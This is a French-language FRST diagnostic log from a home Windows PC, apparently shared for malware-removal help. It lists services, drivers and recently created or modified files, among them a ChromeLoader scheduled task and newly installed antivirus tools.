R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe [2876152 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe [128360 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 iPod Service; "C:\Program Files\iPod\bin\iPodService.exe" [X]
S4 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_1c83a5d7cffd7bff\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_1c83a5d7cffd7bff\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Pilotes (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

S3 AppleKmdfFilter; C:\WINDOWS\System32\drivers\AppleKmdfFilter.sys [20032 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
R2 BlueStacksDrv_nxt; C:\Program Files\BlueStacks_nxt\BstkDrv_nxt.sys [315632 2021-06-28] (Bluestack Systems, Inc -> Bluestack System Inc.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Fichier non signé]
S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [Fichier non signé]
S3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [42256 2021-07-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [59360 2021-07-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 iVCam; C:\WINDOWS\system32\DRIVERS\iVCam.sys [1090536 2020-11-02] (Shanghai Yitu Information Technology Co., Ltd. -> e2eSoft)
S3 R0RazerSynapseService; C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.sys [14544 2022-01-04] (Noriyuki MIYAZAKI -> OpenLibSys.org)
S3 RzCommon; C:\WINDOWS\System32\drivers\RzCommon.sys [54632 2021-03-30] (Razer USA Ltd. -> Razer Inc)
S3 RzDev_0306; C:\WINDOWS\System32\drivers\RzDev_0306.sys [54168 2020-08-24] (Razer USA Ltd. -> Razer Inc)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
S3 SnapCameraVirtualDevice; C:\WINDOWS\System32\drivers\SnapCameraVirtualDevice.sys [2800232 2020-10-12] (Snap Inc. -> Windows (R) Win 7 DDK provider)
S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2021-02-23] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2021-12-16] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [435432 2021-12-16] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [86248 2021-12-16] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)


==================== Un mois (créés) (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2022-01-05 09:33 - 2022-01-05 09:35 - 000027598 _____ C:\Users\citro\Downloads\FRST.txt
2022-01-05 09:33 - 2022-01-05 09:34 - 000000000 ____D C:\FRST
2022-01-05 09:32 - 2022-01-05 09:32 - 002311168 _____ (Farbar) C:\Users\citro\Downloads\FRST64.exe
2022-01-04 21:44 - 2022-01-04 21:44 - 000350882 _____ C:\Users\citro\Desktop\ZHPDiag.txt
2022-01-04 21:39 - 2022-01-04 21:44 - 000000000 ____D C:\Users\citro\AppData\Roaming\ZHP
2022-01-04 21:39 - 2022-01-04 21:39 - 000000910 _____ C:\Users\citro\Desktop\ZHPDiag.lnk
2022-01-04 21:39 - 2022-01-04 21:39 - 000000000 ____D C:\Users\citro\AppData\Local\ZHP
2022-01-04 21:17 - 2022-01-04 21:17 - 000000000 ____D C:\Users\citro\AppData\Local\mbam
2022-01-04 21:16 - 2022-01-04 21:16 - 000000000 ____D C:\Program Files\Malwarebytes
2022-01-04 20:36 - 2022-01-04 20:36 - 000061304 _____ () C:\WINDOWS\system32\Drivers\lpsport.sys
2022-01-04 20:35 - 2022-01-04 20:34 - 000340248 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe
2022-01-04 20:35 - 2022-01-04 20:34 - 000215432 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswf4a2fde06ab37e18.tmp
2022-01-04 20:26 - 2022-01-04 20:26 - 000000000 ___HD C:\$AV_ASW
2022-01-04 20:18 - 2022-01-04 20:18 - 000001311 _____ C:\Users\citro\Desktop\Unpacking.lnk
2022-01-04 20:17 - 2022-01-04 20:30 - 000000000 ____D C:\Users\citro\AppData\Local\Discord
2022-01-04 20:16 - 2022-01-04 20:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2022-01-04 20:14 - 2022-01-04 20:34 - 000021936 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw2251b6c9e9311123.tmp
2022-01-04 20:14 - 2022-01-04 20:14 - 000000000 ____D C:\Users\citro\AppData\Roaming\Avast Software
2022-01-04 20:11 - 2022-01-04 20:34 - 000545176 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswb1f279e91ea730f0.tmp
2022-01-04 20:11 - 2022-01-04 20:34 - 000540056 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw8c470150e4a6c49a.tmp
2022-01-04 20:11 - 2022-01-04 20:34 - 000318760 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswa4d8f15edf7bd6f5.tmp
2022-01-04 20:11 - 2022-01-04 20:34 - 000252992 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw36b50b4aaade3a62.tmp
2022-01-04 20:11 - 2022-01-04 20:34 - 000186280 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswcbd8911096fddde0.tmp
2022-01-04 20:11 - 2022-01-04 20:34 - 000108912 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw549335f17096ccc3.tmp
2022-01-04 20:11 - 2022-01-04 20:34 - 000100416 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw487db485cd2c3a72.tmp
2022-01-04 20:11 - 2022-01-04 20:34 - 000083976 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswb627269329b5c841.tmp
2022-01-04 20:11 - 2022-01-04 20:34 - 000042416 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw3179455d70ab245f.tmp
2022-01-04 20:11 - 2022-01-04 20:33 - 000853800 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswe669871fd18cce75.tmp
2022-01-04 20:11 - 2022-01-04 20:33 - 000369216 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswea5398ca455cf1fc.tmp
2022-01-04 20:11 - 2022-01-04 20:33 - 000223176 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw439db150783ae397.tmp
2022-01-04 20:11 - 2022-01-04 20:11 - 000000000 ____D C:\Program Files\Common Files\Avast Software
2022-01-04 20:10 - 2022-01-04 21:35 - 000000000 ____D C:\ProgramData\Avast Software
2022-01-04 20:10 - 2022-01-04 20:10 - 000000000 ____D C:\Program Files\Avast Software
2022-01-04 19:47 - 2022-01-04 19:47 - 000000000 ____D C:\Users\citro\AppData\LocalLow\Witch Beam
2022-01-04 19:16 - 2022-01-04 19:24 - 1363077225 _____ C:\Users\citro\Downloads\com.madheadgames.adamwolfes01googfree_105_apktada.com.zip
2022-01-04 19:16 - 2022-01-04 19:18 - 1363513834 _____ C:\Users\citro\Downloads\Adam Wolfe Dark Detective Mystery Game_v1.0.5_apkpure.com.xapk
2022-01-04 19:12 - 2019-07-23 22:38 - 000000000 ____D C:\Users\citro\Downloads\The Interactive Adventures of Dog Mendonca and Pizzaboy
2022-01-04 19:08 - 2022-01-04 19:08 - 000000000 ____D C:\Users\citro\AppData\Local\chrome
2022-01-04 19:07 - 2022-01-04 19:07 - 000012806 _____ C:\WINDOWS\system32\Tasks\ChromeLoader
2022-01-04 18:35 - 2022-01-04 18:36 - 000000000 ____D C:\Users\citro\Downloads\maison kek
2022-01-03 12:38 - 2022-01-03 12:38 - 000064683 _____ C:\Users\citro\Downloads\RIB_Nickel_KEVIN_BRAGA DOS SANTOS.pdf
2022-01-01 18:43 - 2022-01-01 18:43 - 000000000 ____D C:\Users\citro\Documents\Adobe
2022-01-01 13:54 - 2022-01-01 13:54 - 000106332 _____ C:\Users\citro\Downloads\Mini-magn-tophone-Portable-en-vinyle-3-pouces-disque-LP-33-RPM-Bluetooth-phonographe-haut-parleur.jpg_Q90.jpg_.webp
2022-01-01 13:54 - 2022-01-01 13:54 - 000061328 _____ C:\Users\citro\Downloads\H29c7e853e1984b83b6afc308cbbf87d2i.webp
2021-12-30 12:18 - 2021-12-30 12:18 - 000002387 _____ C:\Users\citro\Desktop\StreamLabels.lnk
2021-12-30 12:17 - 2021-12-30 12:17 - 000001855 _____ C:\Users\citro\Desktop\Twin Mirror.lnk
2021-12-30 12:17 - 2021-12-30 12:17 - 000001169 _____ C:\Users\citro\Desktop\The Tenants.lnk
2021-12-30 12:16 - 2021-12-30 12:16 - 000001129 _____ C:\Users\citro\Desktop\Snowtopia.lnk
2021-12-30 12:16 - 2021-12-30 12:16 - 000001124 _____ C:\Users\citro\Desktop\Don't Starve.lnk
2021-12-30 12:15 - 2021-12-30 12:15 - 000001273 _____ C:\Users\citro\Desktop\Youtubers Life 2.lnk
2021-12-30 12:14 - 2021-12-30 12:14 - 000001984 _____ C:\Users\citro\Desktop\Island Saver.lnk
2021-12-30 12:13 - 2021-12-30 12:13 - 000002002 _____ C:\Users\citro\Desktop\Scribble It.lnk
2021-12-30 12:09 - 2021-12-30 12:09 - 000001317 _____ C:\Users\citro\Desktop\Sideloadly.lnk
2021-12-30 12:05 - 2021-12-30 12:05 - 000001249 _____ C:\Users\citro\Desktop\Road 96.lnk
2021-12-30 12:04 - 2021-12-30 12:04 - 000001526 _____ C:\Users\citro\Desktop\Poppy Playtime.lnk
2021-12-30 12:04 - 2021-12-30 12:04 - 000001439 _____ C:\Users\citro\Desktop\Roblox.lnk
2021-12-30 12:03 - 2021-12-30 12:03 - 000002284 _____ C:\Users\citro\Desktop\Little Nightmares II.lnk
2021-12-30 12:03 - 2021-12-30 12:03 - 000001175 _____ C:\Users\citro\Desktop\Limbo.lnk
2021-12-30 12:02 - 2021-12-30 12:02 - 000001148 _____ C:\Users\citro\Desktop\GRIS.lnk
2021-12-30 12:00 - 2021-12-30 12:00 - 000000816 _____ C:\Users\citro\Desktop\Life is Strange True Colors.lnk
2021-12-30 11:56 - 2021-12-30 11:56 - 000001395 _____ C:\Users\citro\Desktop\Donut County.lnk
2021-12-30 11:56 - 2021-12-30 11:56 - 000000812 _____ C:\Users\citro\Desktop\Erica.lnk
2021-12-30 11:49 - 2021-12-30 11:49 - 000001148 _____ C:\Users\citro\Desktop\Alba.lnk
2021-12-30 11:41 - 2021-12-30 11:41 - 000000874 _____ C:\Users\citro\Desktop\Alan Wake.lnk
2021-12-30 11:38 - 2021-12-30 11:38 - 000000000 ____D C:\Users\Public\Documents\Epic
2021-12-30 11:07 - 2021-12-30 11:07 - 000001153 _____ C:\Users\citro\Desktop\Bust A Move 4.lnk
2021-12-30 10:54 - 2021-12-30 10:54 - 000001749 _____ C:\Users\citro\Desktop\GhostBuster.lnk
2021-12-30 10:54 - 2021-12-30 10:54 - 000001718 _____ C:\Users\citro\Desktop\RCT3.lnk
2021-12-30 10:54 - 2021-12-30 10:54 - 000001686 _____ C:\Users\citro\Desktop\Overcooked2.lnk
2021-12-30 10:54 - 2021-12-30 10:54 - 000001666 _____ C:\Users\citro\Desktop\Automachef.lnk
2021-12-30 10:54 - 2021-12-30 10:54 - 000001538 _____ C:\Users\citro\Desktop\GTA5.lnk
2021-12-30 10:54 - 2021-12-30 10:54 - 000001538 _____ C:\Users\citro\Desktop\DARQ.lnk
2021-12-30 10:03 - 2021-12-30 10:07 - 000000000 ____D C:\Users\citro\Documents\Karine
2021-12-30 09:57 - 2021-12-30 09:57 - 000000815 _____ C:\Users\citro\Desktop\Téléchargements.lnk
2021-12-29 22:53 - 2021-12-29 22:53 - 000000000 ____D C:\Users\Public\Documents\Steam
2021-12-29 19:57 - 2021-12-29 19:59 - 000196237 _____ C:\Users\citro\Downloads\carte grise.pdf
2021-12-29 19:57 - 2021-12-29 19:57 - 000833552 _____ C:\Users\citro\Downloads\Cerfa 15776.pdf
2021-12-29 17:57 - 2021-12-29 17:57 - 000000000 ____D C:\Users\Public\Documents\Catch!
2021-12-29 17:41 - 2021-12-29 17:41 - 017595522 _____ C:\Users\citro\Downloads\hijhiijkl.pdf
2021-12-29 04:24 - 2021-12-29 04:24 - 000112930 _____ C:\Users\citro\Downloads\YX9210447_01.webp
2021-12-29 04:23 - 2021-12-29 04:23 - 000162284 _____ C:\Users\citro\Downloads\YX9211700_01.webp
2021-12-29 04:16 - 2021-12-29 04:17 - 000195512 _____ C:\Users\citro\Downloads\f1a140edd883bddecbd5d3c900467b625d03dccb_cms8328_1.webp
2021-12-24 00:48 - 2021-12-24 00:50 - 1309546336 _____ C:\Users\citro\Downloads\Nouveau dossier.zip
2021-12-18 13:45 - 2021-12-18 13:45 - 000000000 ____D C:\WINDOWS\SystemTemp
2021-12-16 21:09 - 2021-12-16 21:09 - 000000000 ____D C:\Users\citro\AppData\Local\Playtime_Prototype4
2021-12-16 16:32 - 2021-12-16 16:32 - 000011979 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-12-16 16:31 - 2021-12-16 16:31 - 000223744 _____ C:\WINDOWS\SysWOW64\TpmTool.exe
2021-12-16 16:30 - 2021-12-16 16:30 - 000272384 _____ C:\WINDOWS\system32\TpmTool.exe
2021-12-16 16:30 - 2021-12-16 16:30 - 000162816 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-12-16 15:52 - 2021-12-16 15:52 - 000000000 ___HD C:\$WinREAgent
2021-12-14 10:18 - 2021-12-14 10:18 - 000082258 _____ C:\Users\citro\Downloads\pattern-islam-border-decoration-elements-600w-1065238757.webp
2021-12-14 10:18 - 2021-12-14 10:18 - 000066740 _____ C:\Users\citro\Downloads\decorative-seamless-islamic-ornamental-border-600w-318511151.webp
2021-12-14 10:18 - 2021-12-14 10:18 - 000019672 _____ C:\Users\citro\Downloads\gold-vintage-baroque-corner-ornament-600w-514532395.webp
2021-12-14 10:17 - 2021-12-14 10:17 - 000053620 _____ C:\Users\citro\Downloads\islamic-arabic-background-greeting-card-600w-1825965809.webp
2021-12-14 10:17 - 2021-12-14 10:17 - 000029320 _____ C:\Users\citro\Downloads\decorative-corner-border-carved-vintage-600w-1864475335.webp
2021-12-14 10:17 - 2021-12-14 10:17 - 000026826 _____ C:\Users\citro\Downloads\gold-border-motif-corners-middle-600w-1792091495.webp
2021-12-14 10:16 - 2021-12-14 10:16 - 000076736 _____ C:\Users\citro\Downloads\islamic-rectangle-gold-frame-geometric-600w-1968143980.webp
2021-12-14 10:12 - 2021-12-14 10:12 - 000060870 _____ C:\Users\citro\Downloads\islamic-ornaments-traditional-geometric-used-600w-130588430.webp
2021-12-14 10:01 - 2021-12-14 10:01 - 000013722 _____ C:\Users\citro\Downloads\13882540-arabe-motif-floral-élément-d-angle-design-.webp
2021-12-13 15:45 - 2021-12-13 15:45 - 000001314 _____ C:\Users\Public\Desktop\The Sims 4.lnk
2021-12-13 15:21 - 2021-12-13 15:45 - 000000000 ____D C:\Program Files (x86)\The Sims 4
2021-12-12 11:53 - 2021-12-12 11:53 - 000247879 _____ C:\Users\citro\Downloads\ChapelleSainteSims_LemonAlien.zip
2021-12-11 16:04 - 2021-12-11 16:04 - 000000000 ____D C:\Users\citro\Documents\Klei
2021-12-11 16:04 - 2021-12-11 16:04 - 000000000 ____D C:\Users\citro\AppData\Roaming\SmartSteamEmu
2021-12-07 11:06 - 2021-12-07 11:06 - 000019728 _____ C:\Users\citro\Downloads\arabic-floral-frame-traditional-islamic-600w-1059709703.webp
2021-12-07 10:51 - 2021-12-07 10:51 - 000057364 _____ C:\Users\citro\Downloads\16560552-cadre-traditionnel-thaï-or-isolé-sur-blanc.webp

==================== Un mois (modifiés) ==================

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2022-01-05 09:25 - 2021-04-26 20:23 - 000000000 ____D C:\Program Files (x86)\Google
2022-01-04 21:58 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-01-04 21:34 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2022-01-04 21:22 - 2021-05-20 09:07 - 000000000 ____D C:\Users\citro\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wondershare Filmora X
2022-01-04 21:21 - 2021-04-28 10:51 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-01-04 21:21 - 2020-09-27 06:34 - 000008192 ___SH C:\DumpStack.log.tmp
2022-01-04 21:20 - 2021-09-27 18:37 - 000000000 ____D C:\ProgramData\NVIDIA
2022-01-04 21:20 - 2021-04-26 20:46 - 000000000 ____D C:\Program Files (x86)\Steam
2022-01-04 21:20 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2022-01-04 20:38 - 2021-05-08 17:20 - 000000000 ____D C:\Users\citro\AppData\Local\CrashDumps
2022-01-04 20:30 - 2021-04-26 20:50 - 000000000 ____D C:\Users\citro\AppData\Roaming\discord
2022-01-04 20:30 - 2021-04-26 20:40 - 000000000 ____D C:\Users\citro\AppData\Roaming\BitTorrent
2022-01-04 20:27 - 2021-04-26 20:41 - 000000000 ____D C:\Users\citro\AppData\Local\BitTorrentHelper
2022-01-04 20:23 - 2021-04-27 21:58 - 000000000 ____D C:\Program Files\WinRAR
2022-01-04 20:20 - 2021-04-26 20:49 - 000000000 ____D C:\Users\citro\AppData\Local\SquirrelTemp
2022-01-04 20:17 - 2021-04-13 20:18 - 000000000 ____D C:\Jeux
2022-01-04 20:16 - 2021-04-27 21:58 - 000000000 ____D C:\Users\citro\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2022-01-04 19:25 - 2021-05-11 11:05 - 000000823 _____ C:\Users\citro\Documents\JEU.txt
2022-01-04 14:59 - 2021-04-28 10:32 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-01-04 08:01 - 2021-05-20 09:07 - 000000000 ___HD C:\Users\citro\AppData\Roaming\VR
2022-01-02 09:53 - 2021-05-08 06:02 - 000000000 ____D C:\Users\citro\AppData\Roaming\obs-studio
2022-01-01 18:46 - 2021-05-06 20:56 - 000001456 _____ C:\Users\citro\AppData\Local\Adobe Enregistrer pour le Web 13.0 Prefs
2022-01-01 10:05 - 2021-09-05 10:07 - 000000978 _____ C:\Users\citro\Documents\idee repas.txt
2021-12-31 16:53 - 2021-07-06 10:43 - 000000000 ____D C:\Users\citro\AppData\Roaming\Ledger Live
2021-12-31 11:38 - 2021-04-26 21:02 - 000000000 ____D C:\Users\citro\AppData\Local\D3DSCache
2021-12-31 10:14 - 2021-08-12 15:01 - 000000000 ____D C:\Users\citro\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2021-12-31 09:04 - 2021-07-11 11:04 - 000000000 ____D C:\Users\citro\AppData\Local\Greenshot
2021-12-30 12:00 - 2021-09-19 22:13 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Life is Strange True Colors
2021-12-30 10:59 - 2021-07-12 08:28 - 000000883 _____ C:\Users\citro\Documents\deco.txt
2021-12-30 10:01 - 2021-08-02 07:33 - 000000000 ____D C:\Users\citro\Documents\insta
2021-12-30 09:52 - 2021-05-04 12:13 - 000000000 ____D C:\Users\citro\AppData\Local\e2eSoft
2021-12-30 09:51 - 2021-04-26 20:14 - 000000000 ____D C:\Users\citro\AppData\Local\Packages
2021-12-30 09:51 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-12-30 09:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-12-30 09:48 - 2021-07-11 12:09 - 000000000 ___RD C:\Users\citro\OneDrive
2021-12-30 09:00 - 2021-04-28 10:37 - 000000000 ____D C:\Users\citro
2021-12-29 18:01 - 2021-04-28 10:47 - 001770906 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-12-29 18:01 - 2019-12-07 15:50 - 000791718 _____ C:\WINDOWS\system32\perfh00C.dat
2021-12-29 18:01 - 2019-12-07 15:50 - 000149884 _____ C:\WINDOWS\system32\perfc00C.dat
2021-12-29 18:01 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-12-29 16:53 - 2021-08-02 06:43 - 000000000 ____D C:\Users\citro\Documents\StreamLabs
2021-12-29 16:51 - 2021-04-28 15:42 - 000000000 ____D C:\ProgramData\CanonIJPLM
2021-12-24 17:55 - 2021-07-06 10:41 - 000000000 ____D C:\Users\citro\AppData\Local\ledger-live-desktop-updater
2021-12-20 00:54 - 2020-03-28 23:31 - 000000000 ____D C:\Program Files\Microsoft Office
2021-12-18 13:49 - 2021-04-28 10:32 - 000438080 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-12-18 13:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-12-18 13:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-12-18 13:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-12-18 13:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2021-12-18 13:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2021-12-18 13:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2021-12-18 13:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2021-12-18 13:45 - 2019-12-07 15:53 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-12-18 13:45 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-12-18 13:45 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-12-18 13:45 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-12-18 13:45 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-12-17 08:44 - 2021-07-17 09:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razer
2021-12-16 16:43 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-12-16 12:30 - 2020-03-28 23:26 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2021-12-15 21:53 - 2021-04-26 20:24 - 000002245 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-12-15 10:47 - 2021-04-27 03:14 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-12-15 10:33 - 2021-04-27 03:13 - 137938848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-12-13 09:38 - 2021-07-19 16:21 - 000000000 ____D C:\Users\citro\Documents\Electronic Arts
2021-12-11 11:16 - 2021-05-06 18:10 - 000000000 ____D C:\Users\citro\AppData\Local\ElevatedDiagnostics
2021-12-11 08:09 - 2021-07-02 06:19 - 000003540 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d73c12aa622f76
2021-12-11 08:09 - 2021-04-28 10:51 - 000003634 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA

==================== Fichiers à la racine de certains dossiers ========

2021-05-20 08:16 - 2021-05-20 08:16 - 000000016 _____ () C:\Users\citro\AppData\Roaming\obs-virtualcam.txt
2021-05-06 20:56 - 2022-01-01 18:46 - 000001456 _____ () C:\Users\citro\AppData\Local\Adobe Enregistrer pour le Web 13.0 Prefs

==================== SigCheck ============================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)

==================== Fin de FRST.txt ========================